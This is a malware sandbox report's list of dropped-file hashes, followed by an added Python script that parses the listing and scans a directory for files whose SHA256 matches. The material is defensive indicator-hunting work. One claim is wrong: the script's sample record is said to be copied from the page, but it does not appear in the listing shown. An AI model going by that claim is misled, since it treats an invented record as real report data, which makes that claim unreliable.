5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5
aeadad4c4f9e8f95a74d455eddfff266
SHA1
ccd9652112e280a7a672240fadac4135c3df8749
SHA256
71899a3bff22084bd6194c0a36a42fe06bd27f5ea2620d742e8696240a573218
SHA512
ec7b67ace26278c88e67be02c92714d3b24ed0959a67fbe5d6a11d61044af94367af64842da9ff92fb829e4985c759f0c66457f256bdfe8a1d31c606537f486d
-
Filesize
1.8MB
MD5
4d64ab44beccabe19b2ffd4ad36cce86
SHA1
c3e1acafa63753e88317c154b54f32faf65b08cb
SHA256
1686d5a90b78b04f567fe1d750ff2f76da7589a38e54170bb4a4524b1507f89e
SHA512
dec4be574d4a24de66eff4b3dc40aa7cc59a89d096459d353ce37b4b47dfe4dcd058bed9b52cac72458c981caedaf186ef1387bc0cffabb65778c8b059ee114c
-
Filesize
11KB
MD5
a33e5b189842c5867f46566bdbf7a095
SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
1.1MB
MD5
ff40a94640e4214deee16e77f0712ecd
SHA1
7d265d2d220d73651cd3e1e07d7ea3e02dda79a5
SHA256
36a247cde0b80f12425bf09acc5b6cfa14bb2a621ecb83c1da2b2977892a8b79
SHA512
89dfb6b80a4fc14b8a064c6244459c38953d3e84c30c96bc5d8e28a3d7a3a33b04b0464c35f887da5d4346aeaedf594f9ad339be084f0c87453040badbfc8025
-
Filesize
1.0MB
MD5
dd8dd7a0402ecd67a83d29fc90131927
SHA1
8aedc3e6204c5f862be08195f558ced52be16190
SHA256
0c136efbeb5ecfd3786991f6acbf112be4e219d4dece0977d73269dfbe1c7c6f
SHA512
0109c2a759fc10813ea1641ed259595ec58309bf8d1029bb3c54b37cb8ddd3209d4d95dd9e3ccd152330858f9162e8db585a83b0408b2f547bd38256123264d7
-
Filesize
11KB
MD5
4a8fbd593a733fc669169d614021185b
SHA1
166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256
714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA512
6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b
-
Filesize
533KB
MD5
33d389aca97e0c2ab7ec7ab74634a820
SHA1
56e6d3d3098b1903fa02ed1f499d8d259b64433b
SHA256
e9f00efc50a5cb18266e8b6856c45ae913ba64d71344adb435f73f17b37a7f82
SHA512
4c733a23bed0b9c760c7fece4e401c9e88441a1b68642e76df79d94bc201dda52fe595c424cfb2d395a6a22c98867f42db955d693ddb93709e0ba31e8c7c0c69
-
Filesize
11KB
MD5
bfbc1a403197ac8cfc95638c2da2cf0e
SHA1
634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256
272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512
b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1
-
Filesize
11KB
MD5
3b068f508d40eb8258ff0b0592ca1f9c
SHA1
59ac025c3256e9c6c86165082974fe791ff9833a
SHA256
07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
SHA512
e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32
-
Filesize
609KB
MD5
2159cedd88325a059199dcf12f1b4900
SHA1
17266bb2ce23cdd130ad25efb55e33f94bf18b82
SHA256
af3d21f68a31831c3c220dd495a353da1fbd66d833f86b4d3802aabe3c8f8e55
SHA512
a1014bd617b647d1b8c5643a4cba69b7d93eff1a2b332085c31c94dbb94d05771c2afc22c8b7c6d5d41ea5e29a0fb1fb3316eb912f4e65d6b1130841da80c54f
-
Filesize
1.0MB
MD5
67d29096c342f82ec8131d5f3cca9757
SHA1
c97675b30e55365c438789e83d69e2ce35761202
SHA256
21466a5666189334c55f03c9e554433dd4c9763764f3a509ce4904235991bc96
SHA512
7b9a68ac44fb342a41b3c38f771e5e4e2bbd0d84f1c3bb7668a187acb6ce1cdf9bfb4e78de5af58ea6188186bbf982288f5cade55dba25f41d40158857822181
-
Filesize
11KB
MD5
87cbab2a743fb7e0625cc332c9aac537
SHA1
50f858caa7f4ac3a93cf141a5d15b4edeb447ee7
SHA256
57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023
SHA512
6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa
-
Filesize
360KB
MD5
9c5ca9bd53ed968ab7b3c1e18dfdeab6
SHA1
81423d1d183637e619f619b21bedda1b71dd1665
SHA256
c43e03e8a4fa54d29fa752f199093ec2249346f8cf12e52eda0b9f6a30b2efa2
SHA512
258b256a1660d2139853f87f1ce8f784ba0de7737c55757d0881c80bf3c715f5298864e394d9b2bef4f60398b56ae66d23f66bd6c31ec8ecc0a8a0a306a362ab
-
Filesize
253KB
MD5
9b7b05f8215d5009ad8bbcb4b4bdaa17
SHA1
339dc4994755517fe514fd4647f623246c144b8e
SHA256
228267da6a2a8c24304cd7a090a1ef53115c20b40a626b08b956235fa2f2af48
SHA512
d79c35fb5a1b1428f76e08ac62cfac2dc7e82bcdd1749fdc016602d5483d25172ff7afd0439115e1f3d5f8391f5f11b6fdb4ddff8885e2bccedab32629842396
-
Filesize
565KB
MD5
9304af50855fd2935b2e864c55dac5d3
SHA1
a9bea86acad3157ceb4ac84860c8cd8c607a97ed
SHA256
76d442e473e29d317ccaf99d732642d246d33955bea3f6e98cac65013df58832
SHA512
94f0b7687db1a54c03445bd59b19033dfc57314318a7611fbb3bff41a9a2897c8ccc339f18e6917338bf6bfde146db5e6134a278566c5e268ec788fdd2711030
-
Filesize
652B
MD5
ec4d67e1db25eafc77fd4b10ae0bccbe
SHA1
8b816db9212db0900250ff7f912465e4fe36b6d4
SHA256
9d3325e8a7dbbf52ed2f5a76281e40b9c7f328fb2ad3aeea0de05302b2dd9a9b
SHA512
cae6222880dc4700ef716b0b0632fcc531953f8e069c621b6e2fb52a04fba82eec820f080def4863b71c1af82a4e4c0f33f91effb9fe7df8281ba5c99c5b3e9c
-
Filesize
1004B
MD5
c76055a0388b713a1eabe16130684dc3
SHA1
ee11e84cf41d8a43340f7102e17660072906c402
SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
Filesize
607B
MD5
d7faa2a5ab639762ac6cd338fe080c61
SHA1
910774d0fb03037da5be7ba91d640e740f4ebcae
SHA256
58b9e94c97e70a371283a89a39c98c294df4dd3d4a07b35157831d652e3aa7b0
SHA512
5cccfb0bcb1a0ee1829742f445e4726f1654538781d595e2b6c9efa53c3dad2965cb88194564c7543ba0c6a8bd9cbd13487552174d825738cc5cd21bb05ed4fc
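The listing above is the report's dropped-file inventory, which an analyst normally turns into an indicator set and hunts for on other hosts. The following is an added example, not part of the sandbox report or its vendor's tooling: it parses this exact listing layout (a Filesize line, the size, then MD5/SHA1/SHA256/SHA512, entries separated by a lone "-"), accepting both the split form shown in the page header and the fused form that text extraction produces ("MD538a8bf..."), rejects any digest whose length or alphabet is wrong, and then hashes every file under a directory looking for a SHA256 match. SAMPLE_LISTING is constructed for the example: its first record is copied from the page, its second is a sentinel built from the well-known digests of an empty file so the offline demo() has something to hit. Function names (parse_listing, hash_file, scan_directory, demo) are the example's own.

```python
"""Parse a sandbox "dropped files" hash listing and hunt for those hashes on disk.

Added example, not part of the original report.  It parses the listing format
shown on this page (a 'Filesize' label, the size, then MD5/SHA1/SHA256/SHA512,
entries separated by a lone '-') in both the split form (label and value on
separate lines) and the fused form produced by extraction ('MD538a8bf...').
"""
import hashlib
import os
import re
import tempfile
from typing import Dict, Iterable, List

# Hex-digit length of each digest; any other length is a truncated or garbled
# hash and must not be loaded as an indicator.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
_HEX = re.compile(r"^[0-9a-f]+$")
_LABEL = re.compile(r"^(Filesize|MD5|SHA1|SHA256|SHA512)\s*(.*)$")

# Constructed sample: the first record is copied from the page in its fused
# form; the second is a sentinel built from the digests of an empty file so
# the offline scan in demo() can match something.
SAMPLE_LISTING = """\
Filesize
18KB
MD538a8bf5cb25f2dca7052faa2f056d162
SHA150bcdff62f03f12157042fb39c81b0773a515cee
SHA256c674f2290d8048689c20f8f91618e4519f6fac990724867ee1ca44555e637d39
SHA512c491d3eab1acf2630e0e3e070bb359b50051a1642ab96279e29bd137ccef19aafd05802b8c87b400c2e5eaf10f82f1ebb5c8ae13391dba930a42ab6b86045146
-
Filesize
0B
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
"""


def _validate(rec: Dict[str, str]) -> Dict[str, str]:
    """Normalise digests to lowercase and reject any of the wrong length or alphabet."""
    for label, n in DIGEST_LEN.items():
        v = rec.get(label, "").lower()
        if len(v) != n or not _HEX.match(v):
            raise ValueError(f"{label} digest malformed: {v!r}")
        rec[label] = v
    return rec


def parse_listing(text: str) -> List[Dict[str, str]]:
    """Turn the flattened listing into dicts keyed Filesize/MD5/SHA1/SHA256/SHA512."""
    lines = [ln.strip() for ln in text.splitlines()]
    records, cur, i = [], {}, 0
    while i < len(lines):
        line, i = lines[i], i + 1
        if line == "-":                      # record separator
            if cur:
                records.append(_validate(cur))
                cur = {}
            continue
        m = _LABEL.match(line)
        if not m:
            continue
        label, value = m.group(1), m.group(2)
        if not value and i < len(lines):     # split form: value sits on the next line
            value, i = lines[i], i + 1
        cur[label] = value
    if cur:                                  # listing need not end with '-'
        records.append(_validate(cur))
    return records


def hash_file(path: str) -> Dict[str, str]:
    """Compute all four digests in one pass so a large file is read only once."""
    hs = {k: hashlib.new(k.lower()) for k in DIGEST_LEN}
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            for h in hs.values():
                h.update(chunk)
    return {k: h.hexdigest() for k, h in hs.items()}


def scan_directory(root: str, records: Iterable[Dict[str, str]]) -> Dict[str, str]:
    """Return {path: sha256} for every file under root whose SHA256 is in the listing."""
    wanted = {r["SHA256"] for r in records}
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                d = hash_file(path)
            except OSError:                  # locked or vanished file: skip, don't abort
                continue
            if d["SHA256"] in wanted:
                hits[path] = d["SHA256"]
    return hits


def demo() -> Dict[str, str]:
    """Scan a throwaway directory holding one sentinel match and one benign file."""
    records = parse_listing(SAMPLE_LISTING)
    with tempfile.TemporaryDirectory() as tmp:
        open(os.path.join(tmp, "empty.bin"), "wb").close()
        with open(os.path.join(tmp, "benign.txt"), "wb") as f:
            f.write(b"nothing to see here\n")
        hits = scan_directory(tmp, records)
    return {os.path.basename(p): h for p, h in hits.items()}


if __name__ == "__main__":
    for name, sha in demo().items():
        print(f"MATCH {name} sha256={sha}")
```

Matching is done on SHA256 only; MD5 and SHA1 are parsed and length-checked so a corrupted entry is caught at load time, but they are not used as the match key because collisions in either are practical. To hunt with the real report, paste the whole dropped-files section into a file, call parse_listing on its text and point scan_directory at the suspect host's profile or temp directories.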